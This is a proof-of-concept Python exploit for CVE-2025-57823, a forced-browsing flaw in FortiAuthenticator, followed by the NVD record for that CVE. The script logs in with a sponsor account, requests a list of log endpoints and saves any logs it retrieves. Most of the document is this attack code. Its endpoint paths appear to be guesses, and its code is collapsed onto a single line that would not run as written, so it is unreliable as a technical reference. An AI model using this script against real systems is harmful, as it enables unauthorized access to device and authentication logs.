CVE-2025-57823

import requests import sys # CVE-2025-57823 PoC - FortiAuthenticator Forced Browsing # Target: FortiAuthenticator 6.3 - 6.6.6 # Authentication required: At least sponsor privileges TARGET_URL = "https://<fortiauthenticator-host>" USERNAME = "sponsor_user" PASSWORD = "password" def exploit(): """Exploit forced browsing to access device logs""" session = requests.Session() # Step 1: Login with sponsor account login_url = f"{TARGET_URL}/login" login_data = { "username": USERNAME, "password": PASSWORD } response = session.post(login_url, data=login_data, verify=False) if response.status_code != 200: print("[-] Login failed") return False print("[+] Login successful with sponsor account") # Step 2: Direct access to log endpoints (forced browsing) log_endpoints = [ "/api/v1/logs/device", "/api/v1/logs/system", "/api/v1/logs/authentication", "/log/device.log", "/logs/system.log" ] for endpoint in log_endpoints: log_url = f"{TARGET_URL}{endpoint}" response = session.get(log_url, verify=False) if response.status_code == 200 and "log" in response.text.lower(): print(f"[+] Found accessible log endpoint: {endpoint}") print(f"[*] Log content preview: {response.text[:500]}") # Download logs with open(f"log_{endpoint.replace('/', '_')}.txt", 'w') as f: f.write(response.text) print(f"[+] Log saved to log_{endpoint.replace('/', '_')}.txt") return True print("[-] No accessible log endpoints found") return False if __name__ == "__main__": exploit()

{"cve": {"id": "CVE-2025-57823", "sourceIdentifier": "[email protected]", "published": "2025-12-09T18:15:54.480", "lastModified": "2025-12-09T19:45:32.077", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A direct request ('forced browsing') vulnerability in Fortinet FortiAuthenticator 6.6.0 through 6.6.6, FortiAuthenticator 6.5 all versions, FortiAuthenticator 6.4 all versions, FortiAuthenticator 6.3 all versions may allow an authenticated attacker with at least sponsor permissions to read and download device logs via accessing specific endpoints"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N", "baseScore": 2.7, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.2, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-425"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortiauthenticator:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.3.0", "versionEndIncluding": "6.6.6", "matchCriteriaId": "D8E31FF4-4BA1-4835-91DF-C8DF310BF8E8"}]}]}], "references": [{"url": "https://fortiguard.fortinet.com/psirt/FG-IR-25-554", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}